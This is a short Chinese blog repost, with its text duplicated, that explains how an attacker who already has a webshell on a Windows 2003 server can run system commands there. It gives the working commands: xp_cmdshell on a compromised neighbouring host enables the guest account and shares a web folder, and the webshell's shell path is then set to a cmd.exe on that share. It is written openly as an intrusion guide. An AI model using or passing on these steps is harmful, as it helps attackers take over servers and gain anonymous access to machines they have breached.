文章作者: pt007 (文章很簡潔,但做起來很困難)
最近在入侵Win2003時發現缺省情況下無法利用系統自帶的cmd.exe文件來執行系統命令,上傳cmd.exe文件時因為文件太大而失敗,後來我通過一台相鄰機器的文件共享成功上傳了cmd.exe文件,具體過程如下:
我們已經獲得了相鄰機器(192.168.1.1)的管理員權限,利用SQL的xp_cmdshell命令執行以下的操作:
net user guest /active:yes 打開guest用戶以允許文件共享的匿名訪問
net share web=d:\web 將本機的WEB目錄共享
然後在目標機上的WEBSHELL上的shell路徑裡面輸入: \\192.168.1.1\web\cmd.exe
最後將上圖中的SHELL路徑改為c:\cmd.exe即可正常運行系統命令。
由於cmd.exe可以通過打包上傳到服務器,我建議哪位高手寫一個基於ASP的RAR解壓軟件來方便2003服務器下的上傳cmd.exe程序。
原文轉貼處 http://www.hackeroo.com/read.php?tid=646
最近在入侵Win2003時發現缺省情況下無法利用系統自帶的cmd.exe文件來執行系統命令,上傳cmd.exe文件時因為文件太大而失敗,後來我通過一台相鄰機器的文件共享成功上傳了cmd.exe文件,具體過程如下:
我們已經獲得了相鄰機器(192.168.1.1)的管理員權限,利用SQL的xp_cmdshell命令執行以下的操作:
net user guest /active:yes 打開guest用戶以允許文件共享的匿名訪問
net share web=d:\web 將本機的WEB目錄共享
然後在目標機上的WEBSHELL上的shell路徑裡面輸入: \\192.168.1.1\web\cmd.exe
最後將上圖中的SHELL路徑改為c:\cmd.exe即可正常運行系統命令。
由於cmd.exe可以通過打包上傳到服務器,我建議哪位高手寫一個基於ASP的RAR解壓軟件來方便2003服務器下的上傳cmd.exe程序。
原文轉貼處 http://www.hackeroo.com/read.php?tid=646
全站熱搜
留言列表
